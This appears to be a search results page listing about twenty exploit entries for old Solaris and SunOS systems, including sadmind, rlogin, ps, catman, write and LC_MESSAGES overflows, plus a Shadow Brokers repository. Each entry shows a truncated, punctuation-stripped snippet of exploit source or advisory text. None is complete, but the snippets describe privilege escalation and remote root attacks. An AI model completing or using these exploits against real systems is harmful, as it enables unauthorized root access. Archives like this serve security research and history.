20 matches found
shadowbroker
This repository contains a collection of exploits and tools, including the "EARLYSHOVEL" exploit for RedHat 7.0-7.1 Sendmail 8.11.x, the "EBBISLAND EBBSHAVE" exploit for Solaris 6, 7, 8, 9 & 10, and the "ECHOWRECKER" exploit for remote Samba 3.0.x Linux. The repository also includes a payload...
Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit
No description provided by source. include stdio.h include unistd.h / /usr/bin/write overflow proof of conecpt. Tested on Solaris 7 x86 Pablo Sor, Buenos Aires, Argentina. 01/2000 [email protected] usage: write-exp shelloffset retaddroffset default offset should work. / long getesp asm"movl...
Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC)
Exploit for solaris platform in category remote exploits ======================================================================= Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit SPARC ======================================================================= / $Id: raptorrlogin.c,v 1....
KAME Racoon - Initial Contact SA Deletion
KAME Racoon - Initial Contact SA Deletion // source: https://www.securityfocus.com/bid/9417/info It has been reported that it may be possible for attackers to remotely delete security associations SAs in hosts running the KAME IKE daemon Racoon. / Sun Microsystems Solaris sysinfo Kernel Memory...
Solaris /bin/login (SPARC/x86) - Remote Code Execution
/ 7350963 - /bin/login remote root explot SPARC/x86 TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. C COPYRIGHT TESO Security, 2001 All Rights Reserved bug found by scut 2001/12/20 thanks to halvar,scut,typo,random,edi,xdr. special thanks to...
Solaris_x86_mail_exploit.txt
Greetings, A few weeks ago I posted regarding an overflow in /usr/bin/mail on Solaris 2.7. I incorrectly stated that mail drops privs before the overflow occurs. Cheez Whiz, who wrote the shellcode, saw my post on Packetstorm and supplied the following information: ...The problem with your presen...
patchadd.pl
Here is an exploit to an old bug for patchadd in Solaris. It exploits a symlink vulnerability to clobber files with output from patchadd. This was written and tested on Solaris 2.8 Sparc with the current patch cluster applied. -- Larry http://vapid.dhs.org:8080 !/usr/local/bin/perl Exploit for...
Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit
Exploit for solaris platform in category local exploits ======================================================= Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit ======================================================= include include / /usr/bin/write overflow proof of conecpt. Tested on...
Solaris 7 / 8-beta arp Local Overflow Exploit
Exploit for solaris platform in category local exploits ============================================= Solaris 7 / 8-beta arp Local Overflow Exploit ============================================= / arp overflow proof of concept by email protected shellcode originally written by Cheez Whiz. tested o...
SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber
SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber !/usr/local/bin/perl -w The problem is catman creates files in /tmp insecurly. They are based on the PID of the catman process, catman will happily clobber any files that are symlinked to that file. The idea of this script is to watch the...
Solaris 2.7/2.8 Catman - Local Insecure tmp Symlink
!/usr/local/bin/perl -w The problem is catman creates files in /tmp insecurly. They are based on the PID of the catman process, catman will happily clobber any files that are symlinked to that file. The idea of this script is to create a block of symlinks to the target file with the current PID a...
solaris_LCmessages.txt
Subject: Question on Solaris LCMESSAGES libc exploit To: [email protected] Hello, A previous message stated that the LCMESSAGES bug in Solaris has been fixed in 7. However, I am still able to gain root with the below code on Sparc Solaris 7 5/99 Release boxes with MU2 and 7Recommended pat...
ff.core.sh
Date: Thu, 7 Jan 1999 12:28:59 -0500 From: John McDonald To: [email protected] Subject: really silly ff.core exploit for Solaris Hi, At the bottom of this email is an exploit I wrote a little bit ago for /usr/openwin/bin/ff.core on Solaris 2.5.1, and 2.6. I have tested it on a few machines, wi...
ps_expl.sh
--- psexpl.sh: cut here --- !/bin/sh Exploit for Solaris 2.5.1 /usr/bin/ps J. Zbiciak, 5/18/97 change as appropriate CC=gcc Build the "replacement message" :- cat psexpl.po psexpl.c include include include define BUFLENGTH 632 define EXTRA 256 int mainint argc, char argv char bufBUFLENGTH + EXTRA...
Solaris 2.52.5.12.67.0 - sadmind Remote Buffer Overflow (1)
Solaris 2.52.5.12.67.0 - sadmind Remote Buffer Overflow 1 // source: https://www.securityfocus.com/bid/866/info Certain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite...
IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)
/ source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LCMESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's...
Solaris 5.5.1 X11R6.3 - xterm -xrm Local Privilege Escalation
Solaris 5.5.1 X11R6.3 - xterm -xrm Local Privilege Escalation / X11R6.3 xterm exploit for solaris 5.5.1 by DCRH 28/5/97 / include include include include define EXTRA2 1300 define BUFLENGTH 400 define EXTRA 500 / Need an addr such that contents of addr+0xe98 = 0 / define SAFEADDR unsigned0xefff20...
Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer
cat psexpl.po psexpl.c include include include define BUFLENGTH 632 define EXTRA 256 int mainint argc, char argv char bufBUFLENGTH + EXTRA; / ps will grok this file for the exploit code / char envp="NLSPATH=/tmp/foo",0; ulong longp; uchar charp; / This will vary depending on your libc / ulong...
Solaris 2.5.02.5.1 ps chkey - Data Buffer
Solaris 2.5.02.5.1 ps chkey - Data Buffer cat psexpl.po psexpl.c include include include define BUFLENGTH 632 define EXTRA 256 int mainint argc, char argv char bufBUFLENGTH + EXTRA; / ps will grok this file for the exploit code / char envp="NLSPATH=/tmp/foo",0; ulong longp; uchar charp; / This wi...
DSquare Exploit Pack: D2SEC_YPUPDATED
Name| d2secypupdated ---|--- CVE| 1999-0209 Exploit Pack| D2ExploitPack Description| Solaris ypupdated Command Execution Notes|...